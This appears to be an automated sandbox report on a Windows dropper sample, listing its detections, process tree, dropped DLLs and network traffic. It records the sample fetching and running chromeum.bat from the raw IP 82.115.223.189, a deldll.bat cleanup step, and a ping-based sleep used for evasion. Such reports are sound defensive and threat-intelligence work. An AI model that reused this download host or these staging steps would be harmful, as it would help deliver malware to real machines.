Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BWuMwnE7tw.exe

Overview

General Information

Sample name:BWuMwnE7tw.exe
renamed because original name is a hash value
Original sample name:bc9e4510fe172f8155d02b28ab79da83.exe
Analysis ID:1559092
MD5:bc9e4510fe172f8155d02b28ab79da83
SHA1:317b2bdf893072d9d5d1484d89ab590ec810b6c4
SHA256:1dd4a56cf8d794eaf33526b673750be20b5d052645a4abfc13fd92781b878d8f
Tags:exeuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • BWuMwnE7tw.exe (PID: 3040 cmdline: "C:\Users\user\Desktop\BWuMwnE7tw.exe" MD5: BC9E4510FE172F8155D02B28AB79DA83)
    • cmd.exe (PID: 7116 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\gentee72\chromeum.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2608 cmdline: cmd.exe /c deldll.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6768 cmdline: ping -n 2 -w 1000 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: BWuMwnE7tw.exeAvira: detected
Source: BWuMwnE7tw.exeVirustotal: Detection: 22%Perma Link
Source: BWuMwnE7tw.exeReversingLabs: Detection: 21%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: BWuMwnE7tw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeCode function: 0_2_100059A0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,0_2_100059A0
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior

Networking

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1
Source: global trafficHTTP traffic detected: GET /chromeum.bat HTTP/1.0User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko) Accept: */*Host: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.189
Source: global trafficHTTP traffic detected: GET /chromeum.bat HTTP/1.0User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko) Accept: */*Host: 82.115.223.189
Source: BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111136503.000000000259F000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110378123.00000000021CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.115.223.189/chromeum.bat
Source: BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111136503.000000000259F000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110378123.00000000021CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.115.223.189/chromeum.bat#tempinstpath#chromeum.bat0
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://s.symcd.com06
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://subca.ocsp-certum.com01
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://www.certum.pl/CPS0
Source: BWuMwnE7tw.exe, 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmp, genteert.dll.0.drString found in binary or memory: http://www.gentee.comB
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: http://www.openssl.org/f
Source: libeay32.dll.0.drString found in binary or memory: http://www.openssl.org/support/faq.html
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drString found in binary or memory: https://www.certum.pl/CPS0
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeCode function: 0_2_10001E100_2_10001E10
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeCode function: 0_2_100083000_2_10008300
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeCode function: 0_2_100077700_2_10007770
Source: BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamessleay32.dllH vs BWuMwnE7tw.exe
Source: BWuMwnE7tw.exe, 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamegentee.dll vs BWuMwnE7tw.exe
Source: BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibeay32.dllH vs BWuMwnE7tw.exe
Source: BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibeay32.dllH vs BWuMwnE7tw.exe
Source: BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamessleay32.dllH vs BWuMwnE7tw.exe
Source: BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibeay32.dllH vs BWuMwnE7tw.exe
Source: BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamessleay32.dllH vs BWuMwnE7tw.exe
Source: BWuMwnE7tw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: BWuMwnE7tw.exeStatic PE information: Section: .gentee ZLIB complexity 0.9985147215721366
Source: classification engineClassification label: mal68.troj.evad.winEXE@10/8@0/2
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile created: C:\Program Files (x86)\59470120112024199253140Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeMutant created: \Sessions\1\BaseNamedObjects\ci199253140
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile created: C:\Users\user\AppData\Local\Temp\genteert.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\gentee72\chromeum.bat""
Source: BWuMwnE7tw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: BWuMwnE7tw.exeVirustotal: Detection: 22%
Source: BWuMwnE7tw.exeReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile read: C:\Users\user\Desktop\BWuMwnE7tw.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\BWuMwnE7tw.exe "C:\Users\user\Desktop\BWuMwnE7tw.exe"
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\gentee72\chromeum.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c deldll.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\gentee72\chromeum.bat""Jump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c deldll.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1Jump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: BWuMwnE7tw.exeStatic PE information: section name: .gentee
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile created: C:\Users\user\AppData\Local\Temp\gentee72\libeay32.dllJump to dropped file
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile created: C:\Users\user\AppData\Local\Temp\gentee72\guig.dllJump to dropped file
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile created: C:\Users\user\AppData\Local\Temp\gentee72\ssleay32.dllJump to dropped file
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile created: C:\Users\user\AppData\Local\Temp\genteert.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1Jump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gentee72\libeay32.dllJump to dropped file
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gentee72\guig.dllJump to dropped file
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gentee72\ssleay32.dllJump to dropped file
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\genteert.dllJump to dropped file
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeCode function: 0_2_100059A0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,0_2_100059A0
